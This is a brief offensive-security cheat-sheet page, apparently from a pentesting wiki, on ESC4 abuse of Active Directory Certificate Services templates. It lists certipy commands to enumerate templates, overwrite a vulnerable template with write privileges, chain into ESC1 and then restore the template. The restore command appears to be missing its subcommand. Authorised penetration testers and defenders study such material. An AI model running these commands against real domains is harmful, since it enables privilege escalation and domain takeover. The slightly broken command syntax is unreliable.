search
githubEdit

ESC4 - Access Control Vulnerabilities

hashtag
Enumeration

  • certipy find -u USER@DOMAIN -p PASSWORD -dc-ip DOMAIN_CONTROLLER

hashtag
Exploitation

  • certipy template -u USER@DOMAIN -p 'PASSWORD' -template VULN_TEMPLATE -save-old -debug (Write privileges over a certificate template)

hashtag
Use ESC1 on vulnerable template

hashtag
Then:

  • certipy -u USER@DOMAIN -p 'PASSWORD' -template VULN_TEMPLATE -configuration TEMPLATE.json (Restore template)

PreviousESC8 - AD CS Relay AttackNextESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

Last updated